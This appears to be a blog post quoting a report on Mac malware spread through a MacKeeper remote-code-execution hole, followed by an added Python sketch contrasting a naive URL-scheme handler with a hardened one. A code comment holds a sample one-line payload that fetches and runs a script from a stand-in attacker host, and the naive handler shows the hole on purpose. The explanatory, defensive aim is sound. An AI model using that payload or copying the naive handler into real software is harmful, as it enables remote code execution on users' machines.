- Jan 8, 2011
"Researchers at BAE just reported on a Mac bot known as OSX/Agent-ANTU that was allegedly distributed in a novel way.
The crooks used a security hole in a controversial Mac security and cleanup utility called MacKeeper.
MacKeeper quickly patched the hole after it became known, but until you received the update you were at risk of a Remote Code Execution (RCE) hole.
As long as you were unpatched, a crook could simply entice or redirect you to a poisoned website, and use a single line of JavaScript to send a command script to MacKeeper, which would then run it.
Unfortunately, according to BAE, some crooks struck while the iron was hot.
The crooks sent unpatched MacKeeper users to a web page that tricked their Macs into downloading the OSX/Agent-ANTU malware.
Ironically, the downloader used a fake malware report to justify any MacKeeper popup that might ask you for your administrative password, thus giving the malware system-wide powers.
As in the OSX/LaoShu case mentioned above, the malware included not only a downloader component to let the crooks install what they wanted, but also an upload function handy for stealing files."
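The quoted article says a poisoned page could hand MacKeeper a command script with a single line of JavaScript and the app would run it. The sketch below is added here and is not code from Sophos, BAE or MacKeeper; it is a hypothetical Python model of that bug class: a native helper that registers a custom URL scheme (assumed here, the article does not name the mechanism) and executes whatever text the browser passes in the URL, beside a hardened dispatcher that accepts only fixed, allowlisted actions and never takes executable text from the page. The scheme name `mytool`, the actions, the paths and the sample URLs are all constructed for the example.

```python
"""Hypothetical URL-scheme handler contrasting a naive dispatcher, which runs
whatever script a web page passes in, with a hardened one.  Not MacKeeper's
code; the scheme, actions and paths below are made up for illustration."""
from urllib.parse import parse_qs, urlparse

SCHEME = "mytool"  # assumed custom URL scheme the app registers with the OS

# A web page needs only one line to reach the handler (constructed example):
#   <script>location.href = "mytool://run?script=curl%20http://evil.example/x.sh%7Csh";</script>
# The browser hands the whole URL to the registered app, so everything after
# the scheme is attacker-controlled input, not a trusted request.


def vulnerable_dispatch(url: str) -> str:
    """Naive handler: returns the string it would pass to `/bin/sh -c`.

    Whatever the page put in ?script= is treated as a command to run, so a
    single crafted URL is remote code execution as the logged-in user (and
    as root once the app's own privileged helper asks for the password).
    """
    params = parse_qs(urlparse(url).query)
    return params.get("script", [""])[0]


# Hardened handler: each action maps to a fixed argv chosen by the app, the
# URL carries no executable text, and the caller is told which actions must
# be confirmed by the user before anything runs.
ALLOWED_ACTIONS = {
    "scan": (["/usr/local/bin/mytool-scan", "--quick"], False),
    "show_report": (["/usr/bin/open", "/Library/Logs/mytool/report.html"], True),
}


def hardened_dispatch(url: str) -> tuple[list[str], bool]:
    """Returns (argv, needs_user_confirmation) or raises ValueError.

    argv is a list, so it can be executed without a shell; the URL can only
    select an action by name and cannot add, reorder or inject arguments.
    """
    parsed = urlparse(url)
    if parsed.scheme != SCHEME:
        raise ValueError(f"unexpected scheme {parsed.scheme!r}")
    action = parsed.netloc  # "mytool://scan" -> netloc == "scan"
    if action not in ALLOWED_ACTIONS:
        raise ValueError(f"unknown action {action!r}")
    if parse_qs(parsed.query) or parsed.path not in ("", "/"):
        raise ValueError("actions take no parameters from the URL")
    argv, confirm = ALLOWED_ACTIONS[action]
    return list(argv), confirm
```

The check that matters is the shape of the interface, not the parser: the hardened version gives the page a menu of names, while the naive version gives it a shell. Any real handler should also refuse to escalate on behalf of a URL-triggered request without a prompt that names the requesting page, since the article notes the downloader used a fake scan result to make the password prompt look legitimate.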